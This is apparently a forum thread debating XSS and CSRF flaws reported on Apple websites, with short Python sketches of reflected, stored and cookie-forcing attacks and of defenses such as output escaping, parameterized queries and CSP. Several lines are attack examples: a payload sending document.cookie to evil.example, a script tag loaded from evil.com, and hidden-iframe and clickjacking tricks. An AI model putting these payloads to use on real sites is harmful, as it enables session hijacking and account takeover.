"Compared to other companies Apple has a lot of deprecated (?) legacy applications running. It looks like a mingle-mangle of different programming languages, application servers, domains or hostnames and independently running services - with a lot of bugs."
Nearly every large corporation is similar in this regard.
Apple definitely credits vulnerability reporters appropriately, which is a good thing. However, I don't think that's the issue here. I think the point is that they leave a lot to be desired in terms of communication, response times, and time to patch.
Since he doesn't show the full URL in most of the images it's not possible to say for sure, but many of them appear to be a later stage in a multi-step process (registration, verifying email) to which you couldn't direct someone you wished to exploit.
If you have to enter bogus form input and make it to step 3, then while it is technically still XSS, it's not useful as an attack vector.
The others, where an arbitrary user can be exploited by following a simple link (I think I saw 2-3 of these), are real. CSRF protection won't help you there, since once I have JS running on your page I can insert iframes or use XMLHttpRequest and read the CSRF tokens myself.
Each of the screenshots shows the XSS vulnerability in action. I.e., all of the alert/confirm pop-ups you see in the screenshots are not supposed to be there; they've been injected through an XSS vulnerability.
The assumption is if you can cause an alert to display, you can (probably) run AJAX requests and actually get some data/do some damage.
If the arbitrary JS is specified by a specially crafted URL or form POST, you can make the JS execute in someone else's browser as easily as getting someone to click on a very innocent-looking link.
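That "innocent-looking link" step can be sketched like this. (This is a minimal illustration, not any of the actual Apple endpoints: the site, parameter name, and payload are all made up.)

```python
# Sketch of how a reflected XSS payload rides along in a crafted link.
# The URL and parameter name are invented for illustration.
import html
import urllib.parse

payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
link = "http://store.example.com/search?q=" + urllib.parse.quote(payload)

def render_results_vulnerable(query):
    # Reflects the query verbatim -- the payload executes in the victim's browser.
    return "<p>Results for: %s</p>" % query

def render_results_safe(query):
    # Escaping turns the same payload into inert text.
    return "<p>Results for: %s</p>" % html.escape(query)

# The victim clicks the link; the server reads the parameter back out:
query = urllib.parse.parse_qs(urllib.parse.urlsplit(link).query)["q"][0]
print("<script>" in render_results_vulnerable(query))  # True: script runs
print("<script>" in render_results_safe(query))        # False: rendered harmless
```

The link itself looks like any other search URL once the payload is percent-encoded, which is why "just get someone to click" is a realistic delivery mechanism.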
And as soon as you can get someone to execute arbitrary JS on a particular domain, any CSRF protection will be useless because you practically control their browser. (You can even literally control their browser, if you use BeEF http://www.bindshell.net/tools/beef.html )
You can even completely hide the XSS happening by loading it into an invisible IFRAME, while the main page keeps the victim's attention occupied by playing the promised video of a cute kitten playing with a ball of string.
This should work: http://mkjon.es/xss.html (note that your server seems to hang if I put "<script>" in the GET params, but assuming that works and thus the page is vulnerable to XSS like you intended, then this works). Just pretend the <img /> tag is a script tag.
Of course, this is kind of cheating - I exploit the fact that there's a CSRF bug on your web site. But that's kind of the point - just saying "oh well this is an XSS but it doesn't matter because this other unrelated thing prevents it" is bad security. It's entirely possible, even likely, that someone will come along at a later date and change that other seemingly-unrelated thing, having no idea that they're introducing a security hole in the process.
Cool! I'll look into the CSRF bug. EDIT: Using a vulnerability in another demo page definitely is cheating. But I do like the hack.
To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.
EDIT 2: There was another demo on my server that let you set arbitrary cookies. This exploit relied on setting the JSESSIONID cookie. If a similar exploit existed on Apple's web site, presumably this would defeat the purpose of the exploit, since the target user would no longer be authenticated as him/herself. I changed the cookie demo to disallow arbitrary cookie names, just to prevent it from interfering with other demos.
> To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.
True, they may require some clever hacking to really exploit.
But experience has shown me that (way) more often than not, even though an XSS might not be directly exploitable, there will be further (perhaps not so critical) security problems that will lead to an exploit, given an at-first-sight-not-so-exploitable XSS.
So it's always a better idea to make sure the XSS is not there in the first place, because if someone figures out a way to leverage it, they'll have full control over a visitor's browser on that domain.
Maybe the innocent flaw that allows the exploit isn't even there yet at first, but gets added accidentally with later development. It's still the XSS that is the most critical problem.
Sorry, didn't mean to put words in your mouth. I just wanted to point out that even when it seems like an XSS doesn't demonstrate a vulnerability, some of your assumptions may be wrong and it actually does.
Oh, sorry. Basically he had another endpoint that let you set an arbitrary cookie to an arbitrary value (with no csrf protection).
So first I had it hit that endpoint, setting the JSESSIONID cookie to my value (off of which the csrf token is keyed). Then I had it redirect to an xss'd page with my csrf token, which it would see as valid because it matched the (forced) JSESSIONID.
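The two steps above can be sketched roughly like this (the token scheme, secret, and names are all invented for illustration; the real demo presumably differs in detail):

```python
# Sketch of the cookie-forcing trick: if the CSRF token is keyed off the
# session cookie, an attacker who can force the victim's session cookie to a
# known value also knows a token the server will accept.
import hashlib
import hmac

SERVER_SECRET = b"server-side-secret"  # hypothetical server key

def csrf_token_for(session_id):
    # Token derived deterministically from the session cookie.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def server_accepts(session_id, submitted_token):
    return hmac.compare_digest(csrf_token_for(session_id), submitted_token)

# 1. The attacker starts their own session; the server hands them a matching
#    token (simulated here by calling the server-side function directly).
attacker_session = "attacker-jsessionid"
attacker_token = csrf_token_for(attacker_session)

# 2. Via the unprotected cookie-setting endpoint, the attacker forces the
#    victim's JSESSIONID to the attacker's value...
victim_session = attacker_session

# 3. ...so the forged request carries a token the server considers valid.
print(server_accepts(victim_session, attacker_token))  # True
```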
It would, however, be odd for GET requests to contain an anti-CSRF token. In that case, users couldn't pass links with parameters to others, since every link would carry a session-specific token that's invalid for anyone else. That seems to completely defeat the purpose of GET requests.
Ooh, that's a good one. When I said that, I wasn't thinking about the CSRF token being required with the XSS-able form. So yeah, that partially mitigates the problem.
It can still be done, however. But it'll take more than a few minutes, because I have only read about and played with PoCs of the relevant attacks, never implemented one like that myself.
Now this only works because your form submits the CSRF token via a GET request, so I can read it from the URL. If your form only accepted POST requests, I'm not entirely sure how I'd do it. I need to think about that a little while longer; it's an interesting challenge, though.

There are some (IMO) far-fetched clickjacking-like attacks that require some social engineering (of the containing page) to get the user to perform certain actions that could do it. One way is to wrap a view-source: URL to your page in an IFRAME (only works in Firefox, afaik) and position and dress it up so that only the CSRF token is visible and it looks like a CAPTCHA. The user would enter the CAPTCHA/CSRF and then XSS is possible. But that's not very elegant, and I'm not entirely sure Firefox still allows it. Also it's not guaranteed to succeed if the user can't be bothered to enter a CAPTCHA to see the cute kitten video.
So in that case I'm not sure. One surefire way to prevent these and related clickjacking-style attacks is to put some framebusting JS code in your site. Twitter does this to prevent clickjacking from auto-submitting their pre-filled tweet form. Check their source code; the way they do it is pretty thorough (it even takes into account race conditions that might let the submit click go through just before the frame is busted).
I'm going to have to think about this for a while (how to do it if it were a POST form, that is. I'm fairly sure I could get the GET variant to work easily--I hope you could follow that example). The way you put a CSRF token in that form definitely makes it non-trivial, though.
(BTW, for anyone else attempting a shot at this: the CSRF token is not actually the same value every time; it's randomly generated and tied to the session cookie, so clear your cookies before you try your brilliant exploit.)
I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.
However, a variant of the later attack you describe would work. You could get the user to click on a Flash app on your page, which copies <script src="http://evil.com/script.js"></script> to your clipboard, then says "click on the box below and press ctrl-v, then enter". The box below would of course be the one on the XSSable page, and when the user hit enter, it would submit the form and load up the second page, XSSing the user.
This sounds far-fetched, but I've seen successful attacks like this in the wild.
> I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.
OK--I wondered about that. But I figured BeEF has that capability, so it must be possible somehow. At least as far as I understand, BeEF loads the page in a fullscreen IFRAME and controls the browser from the containing page. Guess I was wrong.
No other way to pull it off? Cause the token is right there in the URL, it's gotta be leaked somewhere ... :-)
If I didn't know that, my original post would have said that all the Apple pages would be invulnerable if they prevented CSRF. I think the expresslane page is one where data could go in the database and others could see it.
CSRF is not a prereq in general, but it is a prereq for the attacks tripzilch listed.
It might sound trivial, but on many systems it can lead to serious privilege escalation and expose huge vulnerabilities further up the chain. Check out the case study below for a real-world example.
Not necessarily. Typical CSRF implementations prevent the server from accepting inputs coming from an "unauthorized" page. This might or might not prevent XSS from being triggered on the client side.
XSS can propagate to other users via database rather than HTTP requests.
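A minimal sketch of that stored ("persistent") variant, with an invented comments table: the payload never travels in the victim's request at all; it arrives via the database when the page is rendered.

```python
# Stored XSS sketch: the attacker submits the payload once, and every later
# visitor receives it in the server's response. Table and names are made up.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE comments (author TEXT, body TEXT)")

# The attacker posts a single comment...
db.execute("INSERT INTO comments VALUES (?, ?)",
           ("mallory", "<script>steal(document.cookie)</script>"))

# ...and the page builder reflects it, unescaped, to all readers.
page = "".join("<p>%s: %s</p>" % row
               for row in db.execute("SELECT author, body FROM comments"))
print("<script>" in page)  # True: the payload executes for every reader
```

Note that no forged cross-site request is involved, which is why CSRF protection is irrelevant to this class of XSS.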
In general, you should prevent attacks one by one. Hoping that one security mechanism will accidentally fix other issues results in a design that is insecure, convoluted, and hard to reason about. Remember: you have to prevent all attacks, while attackers only need to find one vulnerability. Therefore, any kind of complexity in the design works to their advantage.
Exactly, defense in depth is the name of the game.
An example of a defense in depth strategy:
Layer 1: Customer runs a WAF (web app firewall) to do some CSRF and XSS mitigation
Layer 2: App contains its own intrusion detection system that preprocesses all requests for "typical" SQL injection, CSRF and XSS attacks and prevents the rest of the code from executing if this is the case. I'm using PHP-IDS for this.
Layer 3: every request to the server must submit an anti-CSRF token and is immediately refused if it does not do so.
Layer 4: Business logic contains its own positive input validation (all input must be in the expected format), and prevents the rest of the code from executing if the input is not valid. This is meant to prevent XSS and SQL injection when data enters the system.
Layer 5: all DB requests use parameters instead of concatenating variables into queries to mitigate the risk of SQL injection.
Layer 6: All output is encoded to prevent XSS attacks when data leaves the system.
In such a solution you can have a security issue in one of the layers and still have a system that is secure.
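Layer 5 is worth a concrete sketch, since it's the one people most often get wrong. (Hypothetical table and input, using SQLite placeholders; the placeholder syntax varies by driver.)

```python
# Parameterized queries vs. string concatenation: with parameters, hostile
# input stays data and never becomes SQL.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT)")
db.execute("INSERT INTO users VALUES ('alice')")

hostile = "' OR '1'='1"

# Concatenation: the input rewrites the query and matches every row.
rows_concat = db.execute(
    "SELECT name FROM users WHERE name = '%s'" % hostile).fetchall()

# Parameterized: the same input is just an (unmatched) literal string.
rows_param = db.execute(
    "SELECT name FROM users WHERE name = ?", (hostile,)).fetchall()

print(len(rows_concat))  # 1: the injection matched alice
print(len(rows_param))   # 0: no user is literally named "' OR '1'='1"
```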
Exactly. Don't defend from XSS by implementing CSRF defences. Defend from XSS by making sure you properly encode every piece of data that enters your web page. Then add CSRF on top, to prevent third party sites from initiating "clicks" on your page. Then implement Content-Security-Policy to help defend against programmer mistakes which leave CSRF/XSS holes open.
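Those two pieces, encode-on-output plus CSP as a backstop, can be sketched like this. (The header value is an example policy, not a recommendation for any particular site.)

```python
# Encode data where it leaves the system, and send a Content-Security-Policy
# header so that even an encoding bug that slips through doesn't let inline
# or third-party scripts run.
import html

untrusted = '"><script>alert(1)</script>'

# Encode for the HTML context at output time (quote=True also covers
# attribute contexts):
safe = html.escape(untrusted, quote=True)

# Second layer: a restrictive CSP refuses inline scripts and foreign
# script sources in the browser.
headers = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
}
print(safe)  # &quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;
print(headers["Content-Security-Policy"])
```

The point of the ordering is the same as yours: the encoding is the actual defense; CSP only limits the blast radius of mistakes.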
I agree that XSS can propagate to other users via database...I'm pretty sure the expresslane example is a real vulnerability for that reason. But note that the grandparent post was not describing an attack via the database.
I am not hoping that CSRF prevention will make everything OK on the Apple website (which I have no affiliation with, by the way). Nor am I saying XSS prevention is not worthwhile. I'm merely pointing out that this blog post is not demonstrating 11 vulnerabilities in Apple's web site. There might actually be 11 vulnerabilities, but the blog post doesn't give enough information for us to know.
You're right about the search example. That doubles the list of demonstrated vulnerabilities in this article from 1 to 2.
I certainly agree that using GET for changing server state would be wrong. I don't know if any of the examples in the article work that way, since all we're provided with is a screenshot with an alert box. That's demonstrated sloppiness on Apple's web site, but not enough information to demonstrate vulnerability.
(I'm definitely voting up your reply for intelligent discussion.)
These screenshots show pretty textbook reflected XSS vulnerabilities, so I don't see why you think there's a CSRF vulnerability required for an exploit. Most of the targets are innocuous operations that aren't modifying any persistent state, so they wouldn't normally have CSRF protection. In particular, the search queries all appear to support direct-linking (notice the query string), which means they can't employ CSRF mitigations (because it would break the links).
Yes, the search query string is one where CSRF prevention would be out of place. Most of them, though, are intermediate results in a user-specific interaction where CSRF prevention wouldn't break anything. There are a lot of web frameworks out there; some of them likely do CSRF prevention by default. From this article we can definitely conclude that Apple web sites are sloppy in 11 places, but there's not enough information to say there are 11 vulnerabilities.
I'm getting the impression you don't entirely understand how CSRF exploits and mitigations work. Things like CSRF cookies are intended to protect persistent state at the server. I don't think I've ever seen CSRF mitigations used to gate response output. And to be honest, it doesn't sound like a good strategy because it wouldn't necessarily protect the target from exploit. You're still likely to have other vectors of bypassing a CSRF protection used in such a manner.
Your impression is entirely mistaken. I do entirely understand CSRF exploits and mitigations. I think what's happening is that when I write "not a demonstrated vulnerability" you (and others) are reading "a fine and dandy example of web programming". That's why phrases like "doesn't sound like a good strategy" keep popping up in your reply and others when I'm not talking about recommended strategy.
When I wrote my first comment, this story was at the top of the front page. A story about 10 demonstrated vulnerabilities on Apple's web sites would belong there. A story about 2 demonstrated vulnerabilities and 8 instances of sloppiness that might be vulnerabilities but we don't know without more information -- that's not really a top-of-the-front-page story.
You're arguing the existence of a mitigation strategy that's extremely unlikely and not at all evidenced by the information available. So, it's not that I (or anyone else as far as I can tell) took your statements as more than they are. It's just that your basic premise is highly questionable at best. It's not strictly impossible, but it is based on extraordinary assumptions lacking any extraordinary evidence to support them.
(come on people, what's with all the downvotes? this is an interesting discussion! maybe the premise is incorrect but the answers are super informative)
Hey brlewis, even though we haven't managed to (completely/reliably) crack your CSRF example YET ... I hope you agree that it's better to not have an XSS in the first place rather than rely on CSRF to make it (way) more difficult, right?